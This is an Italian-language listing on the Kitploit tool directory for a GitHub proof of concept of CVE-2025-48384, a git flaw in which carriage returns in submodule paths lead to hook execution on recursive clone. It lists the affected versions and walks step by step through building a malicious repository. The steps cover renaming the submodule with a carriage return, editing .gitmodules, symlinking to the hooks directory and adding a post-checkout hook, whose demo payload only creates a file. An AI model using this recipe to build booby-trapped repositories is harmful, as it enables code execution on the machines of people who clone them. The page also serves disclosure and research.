Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-48384-poc — PoC per CVE-2025-48384 | Kitploit
Strumenti/GitHubGitHub/jacobholtz/cve-2025-48384-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e FormazioneSviluppo Payload
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

PoC per CVE-2025-48384

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-48384-poc

CVE-2025-48384 si configura come una vulnerabilità di risoluzione impropria dei link (link following) in git. In particolare, i nomi di file contenenti carriage return vengono analizzati in modo errato in .git/config, e l'inclusione di un symlink che punta a un eseguibile di hook git situato in un sottomodulo come directory degli hook del sottomodulo può portare all'esecuzione di codice arbitrario quando il repository viene clonato con git clone --recursive.

Git per Microsoft Windows non è interessato da questa vulnerabilità, lasciando principalmente vulnerabili versioni specifiche di git su Linux e macOS. Le versioni interessate sono:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 e precedenti

Passaggi per riprodurre la PoC:

  1. Crea due repository, poc e submodule
  2. Nel submodule, crea un hook git post-checkout per eseguire codice quando il repository poc viene clonato in modo ricorsivo:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. In poc, aggiungi il repository del submodule con git submodule add https://github.com/<your submodule repo>.git sub
Scarica lo strumento
  • Aggiungi un carriage return alla nuova cartella sub appena creata con git mv sub $(printf "sub\r")
  • Scrivi printf "\tpath = \"sub\r\"\n" in .gitmodules e rimuovi il percorso originale.
  • Crea un symlink alla cartella hooks nella tua directory .git locale con ln -s .git/modules/sub/hooks sub
  • Aggiungi tutto al repository
  • Speriamo funzioni lol
  • Fonti

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f